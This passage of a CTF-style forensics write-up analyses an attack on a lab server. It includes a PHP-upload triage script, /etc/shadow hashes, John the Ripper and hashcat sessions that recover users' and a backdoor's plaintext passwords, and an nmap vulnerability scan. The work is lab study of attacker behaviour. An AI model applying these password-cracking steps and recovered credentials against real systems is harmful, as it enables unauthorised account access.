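        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        header_block, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):                # CRLF before the next delimiter is framing
            data = data[:-2]
        headers = parse_header_lines(header_block.split(b"\r\n"))
        disposition = headers.get("content-disposition", "")
        name = re.search(r'(?<![\w-])name="([^"]*)"', disposition)   # not the one in filename=
        filename = re.search(r'filename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def triage(part: dict) -> List[str]:
    """Reasons an upload part deserves analyst attention (empty list = nothing seen)."""
    reasons = []
    filename = (part["filename"] or "").lower()
    if filename.endswith(EXEC_EXT):
        reasons.append(f"server-executable extension in filename: {filename}")
    if (part["content_type"] or "").lower() in PHP_TYPES:
        reasons.append(f"client declared PHP content type: {part['content_type']}")
    if b"<?php" in part["data"] or b"<?=" in part["data"]:
        reasons.append("PHP open tag inside uploaded content")
        m = RISKY_PHP.search(part["data"])
        if m:
            reasons.append(f"command/code execution call: {m.group(1).decode()}()")
    return reasons


def analyse_upload_request(raw: bytes) -> List[dict]:
    """Parse one raw HTTP request and triage every form part it carries."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers = parse_header_lines(lines[1:])
    boundary = boundary_from(headers.get("content-type", ""))
    report = []
    for part in parse_multipart(body, boundary):
        report.append({
            "request": request_line,
            "name": part["name"],
            "filename": part["filename"],
            "content_type": part["content_type"],
            "size": len(part["data"]),
            "reasons": triage(part),
        })
    return report


if __name__ == "__main__":
    for entry in analyse_upload_request(SAMPLE_REQUEST):
        flag = "SUSPICIOUS" if entry["reasons"] else "ok"
        print(flag, entry["name"], entry["filename"], entry["size"], "; ".join(entry["reasons"]))
```

The parser keeps the part body as raw bytes, so the same code works when the uploaded file is a binary rather than PHP text; the triage step is the only place that assumes PHP, and the list of risky functions is deliberately short so that a hit is worth a human look rather than a noisy regex sweep.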
---------------- JOHN THE RIPPER ---------------------
WE WILL TRY BRUTE-FORCING WITH ROCKYOU TO SEE IF WE CAN CRACK THE HASHES WE SAW FOR THE USERS IN /ETC/SHADOW THAT THE ATTACKER PULLED FROM OUR VICTIM SERVER:
HASHES:
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
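Before feeding these lines to a cracker it helps to read what the shadow entries themselves say: the hash scheme and iteration count (which is why john reports "Cost 1 (iteration count) is 5000"), the salt, and the day each password was last set. The following added example (not code from the original writeup) parses the five entries above into those fields and checks whether all accounts share the same last-change date, which is a useful indicator during triage of a compromised host (passwords all set on one day usually means an image build or a mass reset, not individual user activity).

```python
from datetime import date, timedelta
from typing import Dict, List, Optional

# The five /etc/shadow entries quoted above, used here as sample input.
SHADOW_LINES = [
    "james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::",
    "paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::",
    "szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::",
    "bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::",
    "muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::",
]

# crypt(3) scheme identifiers. Only md5crypt/sha256crypt/sha512crypt use the
# "$id$[rounds=N$]salt$hash" layout that is split apart below.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "y": "yescrypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt"}
DEFAULT_ROUNDS = {"1": 1000, "5": 5000, "6": 5000}   # iteration count when no rounds= field


def epoch_day_to_date(value: str) -> Optional[str]:
    """shadow stores dates as days since 1970-01-01; an empty field means 'not set'."""
    if value == "":
        return None
    return (date(1970, 1, 1) + timedelta(days=int(value))).isoformat()


def parse_shadow_line(line: str) -> Dict:
    """Split one shadow entry into its nine fields and decode the crypt hash."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}")
    user, pw, lastchg, min_days, max_days, warn, inactive, expire, _reserved = fields
    entry = {
        "user": user,
        "locked": pw.startswith(("!", "*")),     # '!' or '*' prefix: password login disabled
        "algorithm": None, "rounds": None, "salt": None, "hash": None,
        "last_change": epoch_day_to_date(lastchg),
        "min_days": int(min_days) if min_days else None,
        "max_days": int(max_days) if max_days else None,
        "warn_days": int(warn) if warn else None,
        "inactive_days": int(inactive) if inactive else None,
        "expires": epoch_day_to_date(expire),
    }
    if pw.startswith("$"):
        segs = pw.split("$")                      # ['', id, (rounds=N,)? salt, hash]
        ident = segs[1]
        entry["algorithm"] = CRYPT_IDS.get(ident, f"unknown({ident})")
        if ident in ("1", "5", "6"):
            if segs[2].startswith("rounds="):
                entry["rounds"] = int(segs[2][len("rounds="):])
                entry["salt"], entry["hash"] = segs[3], segs[4]
            else:
                entry["rounds"] = DEFAULT_ROUNDS[ident]
                entry["salt"], entry["hash"] = segs[2], segs[3]
    return entry


def parse_shadow(lines: List[str]) -> List[Dict]:
    """Parse a shadow file, skipping blank and comment lines."""
    return [parse_shadow_line(l) for l in lines if l.strip() and not l.startswith("#")]


def shared_last_change(entries: List[Dict]) -> Optional[str]:
    """The last-change date all entries have in common, or None if they differ."""
    dates = {e["last_change"] for e in entries}
    return dates.pop() if len(dates) == 1 else None


if __name__ == "__main__":
    parsed = parse_shadow(SHADOW_LINES)
    for e in parsed:
        print(f"{e['user']:10} {e['algorithm']} rounds={e['rounds']} salt={e['salt']} "
              f"last_change={e['last_change']} max_days={e['max_days']}")
    print("common last-change date:", shared_last_change(parsed))
```

Note that the parser only decodes the salt and hash for the three crypt schemes with a fixed `$id$salt$hash` layout; bcrypt and yescrypt encode cost and salt differently and are reported by algorithm name only.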
*****
JAMES:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo
WAITING......
WE TRY WITH THE FASTTRACK DICTIONARY AND IN THEORY IT WOULD BE Spring2017..starwars:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-02-09 22:42) 0g/s 1480p/s 1480c/s 1480C/s Spring2017..starwars
Session completed.
******
MUIRLAND:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo
WAITING......
WE ALSO TRY WITH FASTTRACK AND THE PASSWORD WOULD BE 1qaz2wsx:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1qaz2wsx (?)
1g 0:00:00:00 DONE (2024-02-09 22:45) 7.692g/s 1707p/s 1707c/s 1707C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
******
PARADOX, AND WE HAVE ITS PASSWORD secuirty3:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_paradox.txt passwdparadox.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secuirty3 (?)
1g 0:00:00:00 DONE (2024-02-09 22:48) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*****
SZYMEX, ITS PASSWORD abcd123:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_szymex.txt passwdszymex.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd123 (?)
1g 0:00:00:00 DONE (2024-02-09 22:50) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*****
BEE, ITS PASSWORD secret12:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_bee.txt passwdbee.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12 (?)
1g 0:00:00:00 DONE (2024-02-09 22:51) 16.66g/s 3700p/s 3700c/s 3700C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
------ MOVING ON TO ANOTHER TOPIC ... :D
-------------------- WE TRY TO CRACK WITH JOHN THE RIPPER THE HASH (WHICH WE SAW THE ATTACKER USE ON THE COMMAND LINE WHEN RUNNING SSHBACKDOOR) TOGETHER WITH THE SALT THE SCRIPT APPENDS TO OUR HASH, SEPARATING THEM WITH : OR WITH LINE BREAKS, AND IT DID NOT WORK WITH JOHN, BUT THEN WE TRIED HASHCAT WITH THE FILE HASH.TXT CONTAINING HASH:SALT, AND AFTER TRYING SEVERAL SHA512 FORMATS WE FOUND THE ONE THAT WORKED, WHICH WAS (SHA-512 (crypt, BSDi) - MODE -m 1710), AND BINGO, WE MANAGED TO CRACK THE PASSWORD (november16)
ATTEMPTS AT JOINING THE HASH AND THE SALT:
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
CREATING THE FILE WITH HASH:SALT:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# nano hashlistoparajondos.txt
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
WE CRACK THE HASH WITH HASHCAT AND IT WORKED:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600 6-Core Processor, 3813/7691 MB (1024 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Mon Feb 12 04:44:49 2024 (0 secs)
Time.Estimated...: Mon Feb 12 04:44:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 268.7 kH/s (0.77ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 17920/14344385 (0.12%)
Rejected.........: 0/17920 (0.00%)
Restore.Point....: 15360/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: soybella -> biscuit1
Hardware.Mon.#1..: Util: 21%
Started: Mon Feb 12 04:44:06 2024
Stopped: Mon Feb 12 04:44:50 2024
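The trial-and-error over SHA-512 modes described above can be shortened once any one credential is known: hashcat's own label for the mode that worked is "1710 (sha512($pass.$salt))", i.e. the backdoor hashes the password with the salt appended as literal text. The following added example (not code from the writeup, nor from the ssh-backdoor project) takes the hash, salt and recovered password quoted on this page and reports which common salted-SHA-512 construction reproduces the digest, together with the matching hashcat mode, so an analyst can confirm the recovered credential and document the backdoor's scheme without re-running a cracker. The mode numbers are hashcat's; the constructed `"pw"`/`"salt"` pair in the usage check is a placeholder.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Values as written on this page: the hash the attacker passed to the backdoor on its
# command line, the salt hard-coded in the backdoor script, and the password hashcat recovered.
BACKDOOR_HASH = ("6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
                 "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed")
BACKDOOR_SALT = "1c362db832f3f864c8c2fe05f2002a05"
RECOVERED_PASSWORD = "november16"

# Salted SHA-512 constructions a home-grown tool is likely to use, each with the
# hashcat mode number that implements it (so the right -m can be picked first time).
CONSTRUCTIONS = {
    "sha512($pass)":           (1700, lambda p, s: hashlib.sha512(p).hexdigest()),
    "sha512($pass.$salt)":     (1710, lambda p, s: hashlib.sha512(p + s).hexdigest()),
    "sha512($salt.$pass)":     (1720, lambda p, s: hashlib.sha512(s + p).hexdigest()),
    "HMAC-SHA512 (key=$pass)": (1750, lambda p, s: hmac.new(p, s, hashlib.sha512).hexdigest()),
    "HMAC-SHA512 (key=$salt)": (1760, lambda p, s: hmac.new(s, p, hashlib.sha512).hexdigest()),
}


def identify_construction(digest_hex: str, salt: str, password: str) -> Optional[Tuple[str, int]]:
    """Return (construction name, hashcat mode) that reproduces digest_hex, or None."""
    p, s = password.encode(), salt.encode()     # salt is used as literal text, not hex-decoded
    target = digest_hex.strip().lower()
    if len(target) != 128:
        raise ValueError("expected a 128-hex-character SHA-512 digest")
    for name, (mode, build) in CONSTRUCTIONS.items():
        if hmac.compare_digest(build(p, s), target):
            return name, mode
    return None


def hashcat_input_line(digest_hex: str, salt: str) -> str:
    """The hash:salt line the salted modes expect (what the page built by hand in nano)."""
    return f"{digest_hex.strip().lower()}:{salt}"


if __name__ == "__main__":
    print(hashcat_input_line(BACKDOOR_HASH, BACKDOOR_SALT))
    print(identify_construction(BACKDOOR_HASH, BACKDOOR_SALT, RECOVERED_PASSWORD))
```

If a tool hex-decodes its salt before hashing instead of using it as text, none of these constructions will match; in that case the same modes apply but the salt must be passed to hashcat with `--hex-salt`.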
---------ON THE WAY BACK, WE HACK THE OVERPASS2 MACHINE BY FOLLOWING THE SAME STEPS OF THE ATTACKER WE ANALYSED----
WE CHECK THE WEBSITE ON PORT 80; THERE IS A MESSAGE IN THE HTML:
http://10.10.217.114/
<body>
<div>
<h1>H4ck3d by CooctusClan</h1>
</div>
<div>
<p>Secure your servers!</p>
</div>
<div><img src="cooctus.png"></div>
</body>
-------------------- NMAP ------------------------
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -Pn -O --script='vuln' 10.10.217.114
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 13:40 UTC
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-217-114.eu-west-1.compute.internal (10.10.217.114)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| PRION:CVE-2019-6111 5.8 https://vulners.com/prion/PRION:CVE-2019-6111
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919
| PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110
| PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-9517 7.8 https://vulners.com/cve/CVE-2019-9517
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
